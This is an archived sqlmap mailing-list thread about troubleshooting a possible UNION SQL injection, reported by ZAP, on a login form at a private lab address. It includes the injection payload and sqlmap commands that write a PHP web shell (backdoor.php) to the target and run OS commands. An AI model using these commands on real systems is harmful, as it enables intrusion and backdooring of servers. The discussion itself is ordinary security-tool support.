Re: [sqlmap-users] File Write Error

Fri, 21 Mar 2014 11:28:25 -0700 

I did not read your first email, so ignore my blitherings :)


On Fri, Mar 21, 2014 at 1:16 PM, Brandon Perry <bperry.volat...@gmail.com>wrote:

> Brian,
>
> I expect the program is taking the input for username and truncating it,
> so ZAP sees the injection going in and a successful auth afterwards and
> assumes the payload worked. I think this is a poor assumption to make.
>
>
> On Fri, Mar 21, 2014 at 1:11 PM, Miroslav Stampar <
> miroslav.stam...@gmail.com> wrote:
>
>> There is always a 302 redirect, so I am not sure how ZAP detected this as
>> a SQLi.
>>
>> Kind regards,
>> Miroslav Stampar
>>
>>
>> On Fri, Mar 21, 2014 at 3:19 PM, Brian Olson <br...@hurrikane.net> wrote:
>>
>>>  Thanks for the quick response, Miroslav and Bernardo.  It's very much
>>> appreciated!  There is a UNION technique that is being reported by ZAP, but
>>> sqlmap isn't finding it and I haven't quite figured out how to simply tell
>>> it what to use explicitly.  ZAP detects a UNION vulnerability on
>>> activate.php:
>>>
>>>
>>>  
>>> "act=auth-login&pag=login&username=ZAP%27+UNION+ALL+select+NULL+--+&password=ZAP"
>>>
>>> My attempts to input this have not been successful, so I'm not sure if
>>> it's a false positive or I'm not using sqlmap quite right (more likely) .
>>>
>>> CMDLINE
>>> sqlmap -u "http://172.16.71.138:7879/activate.php";
>>> --data='act=auth-login&page=login&username=admin&password=admin' -p
>>> "username" --threads=10 --dbms=mysql --level=6 --risk=3 --file-write
>>> /usr/share/webshells/php/simple-backdoor.php --file-dest
>>> progra~1/cyclope/ni4zlja=/backdoor.php  --prefix="'" --suffix="UNION ALL
>>> select NULL --"
>>>
>>> As for the previous method, here's the attached file (on screen output
>>> was massive - password is "password").  End result "[09:01:51] [CRITICAL]
>>> all tested parameters appear to be not injectable. Also, you can try to
>>> rerun by providing either a valid value for option '--string' (or
>>> '--regexp')"
>>>
>>> Thanks for the help!
>>>
>>> Brian
>>>
>>>
>>>
>>> On Fri, Mar 21, 2014 at 8:02 AM, Bernardo Damele A. G. <
>>> bernardo.dam...@gmail.com> wrote:
>>>
>>>> On 21 March 2014 11:57, Bernardo Damele A. G. <
>>>> bernardo.dam...@gmail.com> wrote:
>>>> > [...]
>>>> > All in all, can you please relaunch sqlmap (make sure you run git pull
>>>> > first to sync to the GitHub repository) with the following syntax:
>>>>
>>>> Command line:
>>>>
>>>> python sqlmap.py -u "http://172.16.71.138:7879/index.php";
>>>> --data="act=auth-login&pag=login&username=admin&password=admin" -p
>>>> username --threads=10 --dbms=mysql --level=5 --risk=3 --os-cmd id -v 3
>>>> --parse-errors -t traffic.log --answers "language does the web server
>>>> support=4,do you want to use for writable=2,comma separate list of
>>>> absolute directory paths=C:/Progra~1/Cyclope/ni4zlja/,retrieve the=Y"
>>>>
>>>> Feel free to report back the result, the entire standard output of
>>>> sqlmap and send me the traffic.log.
>>>>
>>>> Thank you.
>>>> Bernardo
>>>>
>>>
>>>
>>>
>>> ------------------------------------------------------------------------------
>>> Learn Graph Databases - Download FREE O'Reilly Book
>>> "Graph Databases" is the definitive new guide to graph databases and
>>> their
>>> applications. Written by three acclaimed leaders in the field,
>>> this first edition is now available. Download your free book today!
>>> http://p.sf.net/sfu/13534_NeoTech
>>> _______________________________________________
>>> sqlmap-users mailing list
>>> sqlmap-users@lists.sourceforge.net
>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>
>>>
>>
>>
>> --
>> Miroslav Stampar
>> http://about.me/stamparm
>>
>>
>> ------------------------------------------------------------------------------
>> Learn Graph Databases - Download FREE O'Reilly Book
>> "Graph Databases" is the definitive new guide to graph databases and their
>> applications. Written by three acclaimed leaders in the field,
>> this first edition is now available. Download your free book today!
>> http://p.sf.net/sfu/13534_NeoTech
>> _______________________________________________
>> sqlmap-users mailing list
>> sqlmap-users@lists.sourceforge.net
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>>
>
>
> --
> http://volatile-minds.blogspot.com -- blog
> http://www.volatileminds.net -- website
>



-- 
http://volatile-minds.blogspot.com -- blog
http://www.volatileminds.net -- website

------------------------------------------------------------------------------
Learn Graph Databases - Download FREE O'Reilly Book
"Graph Databases" is the definitive new guide to graph databases and their
applications. Written by three acclaimed leaders in the field,
this first edition is now available. Download your free book today!
http://p.sf.net/sfu/13534_NeoTech
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users

Reply via email to